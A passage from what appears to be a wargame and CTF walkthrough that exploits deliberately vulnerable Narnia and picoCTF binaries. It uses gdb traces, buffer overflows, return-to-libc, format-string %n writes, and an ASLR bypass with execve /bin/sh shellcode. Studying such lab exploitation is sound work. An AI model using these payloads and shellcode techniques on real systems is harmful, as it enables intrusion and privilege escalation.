0x08048558 <+100>: call 0x8048400 <strcpy@plt>
0x0804855d <+105>: movl $0x2,0x4(%esp)
0x08048565 <+113>: lea 0x58(%esp),%eax
0x08048569 <+117>: mov %eax,(%esp)
We set a breakpoint there and run the program with the following arguments:
(gdb) r `python -c 'print "A"*32 + "/tmp/hack"'`
Starting program: /root/wargames/narnia/3/narnia3 `python -c 'print "A"*32 + "/tmp/hack"'`
Breakpoint 1, 0x08048558 in main (argc=2, argv=0xbffff954) at narnia3.c:37
37 strcpy(ifile, argv[1]);
At the first breakpoint, we examine the local variables
(gdb) i locals
ifd = 134514299
ofd = -1208180748
ofile = "/dev/null\000\000\000\000\000\000"
ifile = "x\370\377\277\234\203\004\b\200\020\377\267\214\230\004\b\250\370\377\277\211\206\004\b$\243\374\267\364\237", <incomplete sequence \374\267>
buf = "\370\370\377\267\364\237\374\267\371\234\367\267\245B\352\267h\370\377\277չ\350\267\364\237\374\267\214\230\004\b"
ofile is set to /dev/null as expected. We’ll step to the next instruction and check again.
(gdb) s
38 if((ofd = open(ofile,O_RDWR)) < 0 ){
(gdb) i locals
ifd = 134514299
ofd = -1208180748
ofile = "/tmp/hack\000\000\000\000\000\000"
ifile = 'A' <repeats 32 times>
buf = "\370\370\377\267\364\237\374\267\371\234\367\267\245B\352\267h\370\377\277չ\350\267\364\237\374\267\214\230\004\b"
As expected, ofile has been overwritten to /tmp/hack. However ifile is now AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack so in order to read /etc/narnia_pass/narnia4, we need to create a directory AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp and symlink /etc/narnia_pass/narnia4 to AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack
narnia3@melissa:/tmp/skojiman3$ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp
narnia3@melissa:/tmp/skojiman3$ ln -s /etc/narnia_pass/narnia4 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack
Next we need to create the output file /tmp/hack that ofile points to
narnia3@melissa:/tmp/skojiman3$ touch /tmp/hack
narnia3@melissa:/tmp/skojiman3$ chmod 666 /tmp/hack
narnia3@melissa:/tmp/skojiman3$ ls -l /tmp/hack
-rw-rw-rw- 1 narnia3 narnia3 0 2012-11-24 22:58 /tmp/hack
Finally, execute /narnia/narnia3 as follows:
narnia3@melissa:/tmp/skojiman3$ /narnia/narnia3 `python -c 'print "A"*32 + "/tmp/hack"'`
copied contents of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack to a safer place... (/tmp/hack)
narnia3@melissa:/tmp/skojiman3$ cat /tmp/hack
thaenohtai ��*������e���@�narnia3@melissa:/tmp/skojiman3$
Let’s see another example, Narnia6.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
extern char **environ;
// tired of fixing values...
// - morla
unsigned long get_sp(void) {
    __asm__("movl %esp,%eax\n\t"
            "and $0xff000000, %eax"
    );
}
int main(int argc, char *argv[]){
    char b1[8], b2[8];
    int (*fp)(char *)=(int(*)(char *))&puts, i;
    if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }
    /* clear environ */
    for(i=0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));
    /* clear argz */
    for(i=3; argv[i] != NULL; i++)
        memset(argv[i], '\0', strlen(argv[i]));
    strcpy(b1,argv[1]);
    strcpy(b2,argv[2]);
    //if(((unsigned long)fp & 0xff000000) == 0xff000000)
    if(((unsigned long)fp & 0xff000000) == get_sp())
        exit(-1);
    fp(b1);
    exit(1);
}
The stack is not executable for this binary. This binary is an example of a “return-to-libc” attack: a computer security attack, usually starting with a buffer overflow, in which a subroutine return address on a call stack is replaced by an address of a subroutine that is already present in the process’ executable memory, rendering the NX bit feature useless (if present) and ridding the attacker of the need to inject their own code. Here the overwritten target is the function pointer fp rather than a return address.
gdb -q narnia6
Reading symbols from /home/bitvijays/narnia6...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : disabled
gdb-peda$
Let’s compile the source locally and check what happens:
gcc -m32 -ggdb -fno-stack-protector -Wall narnia6.c -o narnia61
If you look carefully, we passed "A"*8 + "BBBB" + " " + "C"*8 + "DDDD", which resulted in
gdb -q ./narnia61
gdb-peda$ pdisass main
Dump of assembler code for function main:
0x080486d2 <+330>: call 0x8048450 <exit@plt>
0x080486d7 <+335>: lea eax,[esp+0x20]
0x080486db <+339>: mov DWORD PTR [esp],eax
0x080486de <+342>: mov eax,DWORD PTR [esp+0x28]
0x080486e2 <+346>: call eax
0x080486e4 <+348>: mov DWORD PTR [esp],0x1
0x080486eb <+355>: call 0x8048450 <exit@plt>
End of assembler dump.
gdb-peda$ br *main+346
Breakpoint 1 at 0x80486e2: file narnia6.c, line 48.
gdb-peda$ run `python -c 'print "A"*8 + "BBBB" + " " + "C"*8 + "DDDD"'`
[-------------------------------------code-------------------------------------]
0x80486d7 <main+335>: lea eax,[esp+0x20]
0x80486db <main+339>: mov DWORD PTR [esp],eax
0x80486de <main+342>: mov eax,DWORD PTR [esp+0x28]
=> 0x80486e2 <main+346>: call eax
0x80486e4 <main+348>: mov DWORD PTR [esp],0x1
0x80486eb <main+355>: call 0x8048450 <exit@plt>
0x80486f0 <__libc_csu_fini>: push ebp
0x80486f1 <__libc_csu_fini+1>: mov ebp,esp
Guessed arguments:
arg[0]: 0xffffd380 ("DDDD")
Breakpoint 1, 0x080486e2 in main (argc=0x3, argv=0xffffd444) at narnia6.c:48
48 fp(b1);
gdb-peda$ p b1
$1 = "DDDD\000AAA"
gdb-peda$ p b2
$2 = "CCCCCCCC"
gdb-peda$ p puts
$3 = {<text variable, no debug info>} 0xf7eb3360 <puts>
gdb-peda$ p system
$4 = {<text variable, no debug info>} 0xf7e8bc30 <system>
gdb-peda$ p &b1
$5 = (char (*)[8]) 0xffffd380
gdb-peda$ x/50xw 0xffffd350
0xffffd360: 0xffffd380 0xffffd5df 0x0000003b 0x0804874b
0xffffd370: 0x00000003 0xffffd444 0x43434343 0x43434343
0xffffd380: 0x44444444 0x41414100 0x42424242 0x00000000
0xffffd390: 0x08048700 0xf7fb0ff4 0xffffd418 0xf7e66e46
0xffffd3a0: 0x00000003 0xffffd444 0xffffd454 0xf7fde860
gdb-peda$ p fp
$6 = (int (*)(char *)) 0x42424242
gdb-peda$ p &fp
$7 = (int (**)(char *)) 0xffffd388
gdb-peda$ p $fp
$8 = (void *) 0xffffd398
The address of fp (“p &fp”) is 0xffffd388, and it holds the value (“p fp”) 0x42424242. As before, the stack is not executable, but the program is linked against libc, and stdlib.h declares system(), which is mapped at (“p system”) 0xf7e8bc30. Further, the second strcpy overflows b2 into b1, so DDDD overwrites AAAA and is followed by the null byte.
narnia6@melinda:/narnia$ ./narnia6 `python -c 'print "A"*8 + "\x40\x1c\xe6\xf7" + " " + "C"*8 + "/bin/sh"'`
$ cat /etc/narnia_pass/narnia7
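The two arguments in the final command follow a fixed recipe: the first fills b1 and replaces fp, the second fills b2 and spills the command string into b1. A minimal Python 3 sketch of that recipe is below. `narnia6_args` is a hypothetical helper, and 0xf7e61c40 is the address used in the command above (presumably system() on the target machine; locally gdb reported 0xf7e8bc30).

```python
import struct


def narnia6_args(system_addr, command=b"/bin/sh"):
    """Build argv[1] and argv[2] for the fp overwrite described above."""
    if len(command) > 7:
        # b1 is 8 bytes; a longer string (plus its NUL) would spill into fp
        raise ValueError("command must fit in b1 together with its NUL byte")
    addr = struct.pack("<I", system_addr)
    if b"\x00" in addr:
        raise ValueError("address contains a NUL byte and cannot pass through argv")
    arg1 = b"A" * 8 + addr     # fills b1, then overwrites fp
    arg2 = b"C" * 8 + command  # fills b2, then overwrites b1 with the command
    return arg1, arg2


arg1, arg2 = narnia6_args(0xF7E61C40)
print(arg1, arg2)
```

The order matters: strcpy(b1, ...) runs first and sets fp, then strcpy(b2, ...) rewrites b1 without reaching fp, so the call fp(b1) becomes system("/bin/sh").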
Let’s see another example, Narnia8, where we have to use an environment variable to invoke a shell.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am
// making "i" global unti i find a fix
// -morla
int i;
void func(char *b){
    char *blah=b;
    char bok[20];
    //int i=0;
    memset(bok, '\0', sizeof(bok));
    for(i=0; blah[i] != '\0'; i++)
        bok[i]=blah[i];
    printf("%s\n",bok);
}
int main(int argc, char **argv){
    if(argc > 1)
        func(argv[1]);
    else
        printf("%s argument\n", argv[0]);
    return 0;
}
Let’s see what is happening here: the for loop in func copies data from blah to the bok character array until a null character is found. Let’s see what the stack looks like:
<bok character array><blah pointer><fp><ret><pointer b>
Let’s confirm this using gdb. We put a breakpoint on the printf call in func.
0xffffd670: 0x08048580 0xffffd688 0x00000014 0xf7e54f53
0xffffd680: 0x00000000 0x00ca0000 0x41414141 0x41414141
0xffffd690: 0x41414141 0x41414141 0x00414141 0xffffd8b1
0xffffd6a0: 0x00000002 0xffffd764 0xffffd6c8 0x080484cd
0xffffd6b0: 0xffffd8b1 0xf7ffd000 0x080484fb 0xf7fca000
Address 0xffffd688 marks the start of the character buffer bok. I entered 19 A’s, so it is 0x41 19 times followed by a null 0x00. After that comes 0xffffd8b1 (the value of the blah pointer), then the 12 bytes labelled fp above <0x00000002 0xffffd764 0xffffd6c8>, then 0x080484cd, which is the return address
(gdb) x/s 0x080484cd
0x80484cd <main+31>: "\353\025\213E\f\213"
followed by pointer b (0xffffd8b1). Let’s see what’s at location 0xffffd8b1
(gdb) x/20wx 0xffffd8b1
0xffffd8b1: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd8c1: 0x00414141 0x5f474458 0x53534553 0x5f4e4f49
Let’s see what happens when we try to enter more than 19 characters (the buffer size of bok minus 1 byte for the null character)
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20'`
AAAAAAAAAAAAAAAAAAAA����
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20'` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 d8bf ffff 0a02
000001a
As expected, we get the A’s followed by some garbage, which is the address blah points to. We know that we can overwrite the RET address with
# `python -c 'print "A"*20 + "\x90\x90\x90\x90" + "A"*12 + "BBBB"'`
Let’s see what happens when we do this. After copying 20 A’s it copies \x90 over the lowest byte of blah, changing the pointer from 0xffffd8bf to 0xffffd890. Because of the for loop
for(i=0; blah[i] != '\0'; i++)
it now reads characters relative to 0xffffd890, i.e. from 0xffffd890 + i. Suppose the next character it copies is 0x41. The pointer becomes 0xffff4190, and the for loop now reads from that address until a null character is found.
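The self-corrupting pointer is easier to follow in a simulation. This is a rough Python 3 sketch of the loop in func, using a sparse memory map. The addresses are assumptions borrowed from one gdb session on that machine (bok at 0xffffd678, argv[1] at 0xffffd89c, original return address 0x080484cd), and bytes that were never written read back as 0.

```python
import struct
from collections import defaultdict

BOK = 0xFFFFD678     # start of bok[20]
BLAH = BOK + 20      # the blah pointer sits right after bok
RET = BLAH + 4 + 12  # saved return address, 12 bytes past blah
ARG = 0xFFFFD89C     # where argv[1] is stored


def run_func(arg):
    """Replay func()'s copy loop and return (final blah, final ret)."""
    mem = defaultdict(int)  # unmapped bytes read as 0

    def write32(addr, value):
        for k, byte in enumerate(struct.pack("<I", value)):
            mem[addr + k] = byte

    def read32(addr):
        return struct.unpack("<I", bytes(mem[addr + k] for k in range(4)))[0]

    for k, byte in enumerate(arg):  # argv[1], NUL-terminated by default
        mem[ARG + k] = byte
    write32(BLAH, ARG)              # char *blah = b;
    write32(RET, 0x080484CD)        # return address into main

    i = 0
    # blah is re-read from memory on every iteration, just like the C loop
    while mem[read32(BLAH) + i] != 0:
        mem[BOK + i] = mem[read32(BLAH) + i]
        i += 1
    return read32(BLAH), read32(RET)


naive = b"A" * 20 + b"\x90" * 4 + b"A" * 12 + b"BBBB"
fixed = b"A" * 20 + struct.pack("<I", ARG) + b"A" * 12 + b"BBBB"
print([hex(v) for v in run_func(naive)])
print([hex(v) for v in run_func(fixed)])
```

With the naive payload the copy stops after two bytes of blah have been clobbered and the return address is untouched; writing blah’s own value back over itself lets the loop keep going until BBBB lands on the return address.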
(gdb) x/20xw $esp 0xffffd660: 0xffffd678 0x00000000 0x00000014 0xf7e54f53 0xffffd670: 0x00000000 0x00ca0000 0x41414141 0x41414141 0xffffd680: 0x41414141 0x41414141 0x41414141 0xffffd890 0xffffd690: 0x00000002 0xffffd754 0xffffd6b8 0x080484cd 0xffffd6a0: 0xffffd89c 0xf7ffd000 0x080484fb 0xf7fca000 (gdb) x/10xw 0xffffd890 0xffffd890: 0x2f61696e 0x6e72616e 0x00386169 0x41414141 0xffffd8a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd8b0: 0x90909090 0x41414141 (gdb) x/20xw $esp 0xffffd660: 0x08048580 0xffffd678 0x00000014 0xf7e54f53 0xffffd670: 0x00000000 0x00ca0000 0x41414141 0x41414141 0xffffd680: 0x41414141 0x41414141 0x41414141 0xffff4190 0xffffd690: 0x00000002 0xffffd754 0xffffd6b8 0x080484cd 0xffffd6a0: 0xffffd89c 0xf7ffd000 0x080484fb 0xf7fca000 (gdb) x/10xw 0xffff4190 0xffff4190: 0x00000000 0x00000000 0x00000000 0x00000000 0xffff41a0: 0x00000000 0x00000000 0x00000000 0x00000000 0xffff41b0: 0x00000000 0x00000000If we can somehow keep/change the blah pointer back to it’s original value we may overwrite the RET pointer (after 12 bytes). Let’s see how 0xffffd89c looks when is used
`python -c 'print "A"*20 + "\x90\x90\x90\x90" + "A"*12 + "BBBB"'`(gdb) x/30xw 0xffffd89c 0xffffd89c: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd8ac: 0x41414141 0x90909090 0x41414141 0x41414141 0xffffd8bc: 0x41414141 0x42424242 0x47445800 0x5345535fWhen we used the below with the address, we were able to overwrite the RET by BBBB. Now, we control the EIP :)
(gdb) run `python -c 'print "A"*20 + "\x9c\xd8\xff\xff" + "A"*12 + "BBBB"'`
(gdb) x/20xw $esp
0xffffd660: 0x08048580 0xffffd678 0x00000014 0xf7e54f53
0xffffd670: 0x00000000 0x00ca0000 0x41414141 0x41414141
0xffffd680: 0x41414141 0x41414141 0x41414141 0xffffd89c
0xffffd690: 0x41414141 0x41414141 0x41414141 0x42424242

Let’s export shellcode in an environment variable, check its address on the stack, and redirect the flow of the program to it. Notice the number of NOPs we have put in front of it, both for easy identification and for reachability.
export EGG=`python -c 'print "\x90"*90 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`

Searching the stack for our environment variable, we find its NOP sled around address 0xffffd8d4.
(gdb) x/100xw $esp+500
0xffffd7e4: 0x0000000f 0xffffd80b 0x00000000 0x00000000
0xffffd7f4: 0x00000000 0xde000000 0x1a2a5992 0xf11444ea
0xffffd804: 0x11433cf3 0x694a71a2 0x00363836 0x672f0000
0xffffd814: 0x73656d61 0x72616e2f 0x2f61696e 0x6e72616e
0xffffd824: 0x00386169 0x41414141 0x41414141 0x41414141
0xffffd834: 0x41414141 0x41414141 0xffffd828 0x41414141
0xffffd844: 0x41414141 0x41414141 0x42424242 0x47445800
0xffffd854: 0x5345535f 0x4e4f4953 0x3d44495f 0x35343239
0xffffd864: 0x45485300 0x2f3d4c4c 0x2f6e6962 0x68736162
0xffffd874: 0x52455400 0x74783d4d 0x006d7265 0x5f485353
0xffffd884: 0x45494c43 0x353d544e 0x34392e39 0x2e31362e
0xffffd894: 0x20343731 0x37373835 0x32322032 0x48535300
0xffffd8a4: 0x5954545f 0x65642f3d 0x74702f76 0x31312f73
0xffffd8b4: 0x5f434c00 0x3d4c4c41 0x47450043 0x90903d47
0xffffd8c4: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd8d4: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd8e4: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd8f4: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd904: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd914: 0x90909090 0x90909090 0x99580b6a 0x2f2f6852
0xffffd924: 0x2f686873 0x896e6962 0xcdc931e3 0x53550080
0xffffd934: 0x6e3d5245 0x696e7261 0x4c003861 0x4f435f53
0xffffd944: 0x53524f4c 0x3d73723d 0x69643a30 0x3b31303d

Let’s redirect our program to 0xffffd8d4 to get the shell
(gdb) run `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "A"*12 + "\xd4\xd8\xff\xff"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /games/narnia/narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "A"*12 + "\xd4\xd8\xff\xff"'`
Breakpoint 1, 0x080484a7 in func ()
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAA(���AAAAAAAAAAAA����(���
process 19900 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
Error in re-setting breakpoint 1: No symbol "func" in current context.
Error in re-setting breakpoint 1: No symbol "func" in current context.
Error in re-setting breakpoint 1: No symbol "func" in current context.
$

Trying this outside gdb didn’t work, because the address of the character array changes
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'`
AAAAAAAAAAAAAAAAAAAA(A��
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 4128 ffff 0a02
000001a

Changing 28 to 0a, just by chance, gave me the correct address to point at (0xffffd837 in the hexdump below)
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x0a\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 d837 ffff 0a03
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x37\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'`
AAAAAAAAAAAAAAAAAAAA7���BBBBBBBBBBBB����7���
$

For example, below you need the address of secret to write the new value 0x1337beef.
#include <stdio.h>
#include <stdlib.h>

unsigned secret = 0xdeadbeef;

int main(int argc, char **argv){
    unsigned *ptr;
    unsigned value;
    char key[33];
    FILE *f;

    printf("Welcome! I will grant you one arbitrary write!\n");
    printf("Where do you want to write to? ");
    scanf("%p", &ptr);
    printf("Okay! What do you want to write there? ");
    scanf("%p", (void **)&value);
    printf("Writing %p to %p...\n", (void *)value, (void *)ptr);
    *ptr = value;
    printf("Value written!\n");

    if (secret == 0x1337beef){
        printf("Woah! You changed my secret!\n");
        printf("I guess this means you get a flag now...\n");
        f = fopen("flag.txt", "r");
        fgets(key, 32, f);
        fclose(f);
        puts(key);
        exit(0);
    }
    printf("My secret is still safe! Sorry.\n");
}
In another challenge below, it is easy to see that the value of secret can be changed by entering 16 characters followed by 0xc0deface. As 0xc0deface can’t be typed as ASCII characters, you can use python to pass the input.

python -c 'print "A" * 16 + "\xc0\xde\xfa\xce"'
or
python -c 'print "A" * 16 + "\xce\xfa\xde\xc0"'
based on the endianness of the system.

void give_shell(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

void vuln(char *input){
    char buf[16];
    int secret = 0;
    strcpy(buf, input);

    if (secret == 0xc0deface){
        give_shell();
    }else{
        printf("The secret is %x\n", secret);
    }
}

int main(int argc, char **argv){
    if (argc > 1)
        vuln(argv[1]);
    return 0;
}
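The two byte orders mentioned above can be checked with Python's struct module. This is only a small sketch; the names `SECRET`, `little`, `big` and `payload` are chosen here for illustration and are not part of the challenge.

```python
import struct
import sys

SECRET = 0xC0DEFACE

# "<I" packs a 32-bit unsigned value little-endian, ">I" packs it big-endian.
little = struct.pack("<I", SECRET)
big = struct.pack(">I", SECRET)

print("little-endian:", little.hex())
print("big-endian:   ", big.hex())
print("this machine is", sys.byteorder, "endian")

# On a little-endian target such as x86, the bytes go in "reversed":
payload = b"A" * 16 + little
```

Letting struct.pack do the reversal avoids typing the bytes in the wrong order by hand.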
Controlling the EIP: In the challenge below, an attacker can use a buffer overflow to take control of the program’s execution. The return address for the call to the vuln function is above buf on the stack, so it can be overwritten with an overflow. This allows an attacker to put nearly any address they desire in place of the return address. In this example, the goal is to call the give_shell function.
We need to find the address of the give_shell function, which can be done either with gdb (print give_shell) or with objdump -d outputfile | grep give_shell.
To find the EIP offset, you can use cyclic patterns with pattern_create.rb and pattern_offset.rb. For instance, pattern_create.rb 100 will create a 100-byte cyclic pattern.
Then you feed this as your input to the vulnerable program and it will crash. Note the value of EIP at that point and pass it to pattern_offset.rb to get the offset.
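If the Metasploit scripts are not at hand, the idea behind them can be sketched in a few lines of Python. This is an illustrative re-implementation of the usual upper/lower/digit pattern, not the Metasploit code itself; `pattern_create` and `pattern_offset` are just names borrowed from the scripts, and a 32-bit little-endian target is assumed.

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Build a cyclic pattern of the form Aa0Aa1Aa2...Ab0Ab1..."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the pattern space")


def pattern_offset(eip: int, length: int = 8192) -> int:
    """Return the offset of the 4 bytes found in EIP, or -1 if absent."""
    needle = struct.pack("<I", eip)  # EIP holds the bytes little-endian
    return pattern_create(length).find(needle)


pattern = pattern_create(100)
# Pretend the program crashed with the pattern bytes at offset 76 in EIP.
crashed_eip = struct.unpack("<I", pattern[76:80])[0]
print(hex(crashed_eip), "->", pattern_offset(crashed_eip))
```

The offset returned is the number of filler bytes needed before the four bytes that land in EIP.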
Then, we just need to pass the input to the program by
./a.out $(python -c 'print "A" * Offset + "Address of give_shell in hex"')

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* This never gets called! */
void give_shell(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

void vuln(char *input){
    char buf[16];
    strcpy(buf, input);
}

int main(int argc, char **argv){
    if (argc > 1)
        vuln(argv[1]);
    return 0;
}
Execute Me: If you check the code below, getegid() returns the effective group ID of the calling process, and setresgid() sets the real group ID, the effective group ID, and the saved set-group-ID of the calling process. The read function reads stdin into the buffer, and then ((function_ptr)buf)() is called, which executes whatever is in the buffer.
Since buf will execute anything, we need shellcode that fits in 128 bytes. There is plenty of shellcode (for different platforms and with different behaviour) to be found on Shell-Storm.
Then, we just need to pass the shellcode to the program on its standard input, keeping stdin open with cat so that the shell stays usable:

(python -c 'print "shellcode bytes in hex"'; cat) | ./a.out

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int token = 0;

typedef void (*function_ptr)();

void be_nice_to_people(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

int main(int argc, char **argv){
    char buf[128];

    be_nice_to_people();

    read(0, buf, 128);

    ((function_ptr)buf)();
}
ROP1: This binary is running on a machine with ASLR! (Address space layout randomization (ASLR) is a computer security technique involved in protection from buffer overflow attacks.) Can you bypass it?
From the code provided we can see that there’s a buffer overflow in the vuln() function due to the strcpy() call. Run the program within gdb and see what the state of the registers and the stack is at the time of the crash.
From the cyclic pattern tools, we find that the offset is 76, which can be confirmed by providing an input of 76 “A”s and 4 “B”s to overwrite EIP. Set a breakpoint after the call to strcpy(), that is, at *vuln+24. After the leave and ret instructions are executed, EIP will be set to 0x42424242.
EAX points to our buffer of “A”s, and since the binary doesn’t have the NX bit, we can execute shellcode on the stack. To bypass ASLR, we just need to find an address that will do a JMP/CALL EAX and set that as our return address. msfelfscan can find a list of instructions to accomplish this.
Since the binary is compiled for 32 bit, we search Shell-Storm for Linux_x86 shellcode executing /bin/sh and get the 21-byte shellcode by kernelpanic.
As EAX points to the 76 A’s + BBBB when the vuln function returns, we just need to find an address which will execute JMP EAX. It can be found with msfelfscan -j eax binary_file
One more small but important observation is the number of NOPs: our shellcode is 21 bytes, the offset is 76 bytes and the jmp address is 4 bytes. So, 76 - 21 - 4 = 51.
import struct
code = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
jmpeax = struct.pack("<I",0x080483e7)
print "\x90"*51 + code + jmpeax

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void be_nice_to_people(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

void vuln(char *name){
    char buf[64];
    strcpy(buf, name);
}

int main(int argc, char **argv){
    be_nice_to_people();
    if(argc > 1)
        vuln(argv[1]);
    return 0;
}
Format String Examples
Let’s see a simple example of a format string vulnerability.
Narnia5
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){
    int i = 1;
    char buffer[64];

    snprintf(buffer, sizeof buffer, argv[1]);
    buffer[sizeof (buffer) - 1] = 0;
    printf("Change i's value from 1 -> 500. ");

    if(i==500){
        printf("GOOD\n");
        system("/bin/sh");
    }

    printf("No way...let me give you a hint!\n");
    printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
    printf ("i = %d (%p)\n", i, &i);
    return 0;
}

Let’s see what’s on the stack, and whether we can put something on the stack and change the value of i.
narnia5@melinda:~$ /narnia/narnia5 %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.62653766.36656436.6666662e.] (63)
i = 1 (0xffffd6cc)
narnia5@melinda:~$ /narnia/narnia5 AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [AAAAf7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.41414141.62653766.36656] (63)
i = 1 (0xffffd6cc)
narnia5@melinda:~$ /narnia/narnia5 `python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"'`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [����f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.ffffd6cc.62653766.36656] (63)
i = 1 (0xffffd6cc)
narnia5@melinda:~$ /narnia/narnia5 `python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%08x.%08n.%08x.%08x.%08x"'`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [����f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8..62653766.36656436.6666] (63)
i = 40 (0xffffd6cc)
narnia5@melinda:~$ /narnia/narnia5 `python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%468x.%08n.%08x.%08x.%08x"'`
Change i's value from 1 -> 500. GOOD
$
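The jump from i = 40 to i = 500 in the runs above comes down to counting the characters written before %n. A rough sketch of that arithmetic follows; it assumes every %08x prints exactly eight characters (true for 32-bit values), and the helper names `printed_before_n` and `last_width` are made up for illustration.

```python
def printed_before_n(prefix_len, widths, dots):
    """Characters written before %n: raw prefix + each field width + dots."""
    return prefix_len + sum(widths) + dots


def last_width(target, prefix_len, other_widths, dots):
    """Width the final padded field needs so that %n stores `target`."""
    width = target - printed_before_n(prefix_len, other_widths, dots)
    if width < 8:
        # A 32-bit value printed with %x can take up to 8 characters,
        # so smaller widths would not give a predictable count.
        raise ValueError("target too small for this layout")
    return width


# 4 address bytes, four %08x fields, four dots -> i = 40
print(printed_before_n(4, [8, 8, 8, 8], 4))

# Same layout, but the fourth field must stretch so that the total is 500.
print(last_width(500, 4, [8, 8, 8], 4))
```

The second call reproduces the %468x used in the last run: 4 + 3*8 + 468 + 4 dots = 500.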
In this example, let’s see how a format string can be used to write an arbitrary address.
Narnia7

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int goodfunction();
int hackedfunction();

int vuln(const char *format){
    char buffer[128];
    int (*ptrf)();

    memset(buffer, 0, sizeof(buffer));
    printf("goodfunction() = %p\n", goodfunction);
    printf("hackedfunction() = %p\n\n", hackedfunction);

    ptrf = goodfunction;
    printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

    printf("I guess you want to come to the hackedfunction...\n");
    sleep(2);
    ptrf = goodfunction;

    snprintf(buffer, sizeof buffer, format);

    return ptrf();
}

int main(int argc, char **argv){
    if (argc <= 1){
        fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
        exit(-1);
    }
    exit(vuln(argv[1]));
}

int goodfunction(){
    printf("Welcome to the goodfunction, but i said the Hackedfunction..\n");
    fflush(stdout);
    return 0;
}

int hackedfunction(){
    printf("Way to go!!!!");
    fflush(stdout);
    system("/bin/sh");
    return 0;
}

As we can see, the program provides us with the address of the ptrf pointer and the addresses of goodfunction and hackedfunction. ptrf is assigned the address of goodfunction; if we somehow change it to the address of hackedfunction, we can get a shell. Let’s run the program and see what addresses we get.
./narnia71 A
goodfunction() = 0x804871f
hackedfunction() = 0x8048745

before : ptrf() = 0x804871f (0xffb4450c)
I guess you want to come to the hackedfunction...
Welcome to the goodfunction, but i said the Hackedfunction..

and

narnia7@melinda:/narnia$ ./narnia7 A
goodfunction() = 0x80486e0
hackedfunction() = 0x8048706

before : ptrf() = 0x80486e0 (0xffffd64c)
I guess you want to come to the hackedfunction...
Welcome to the goodfunction, but i said the Hackedfunction..

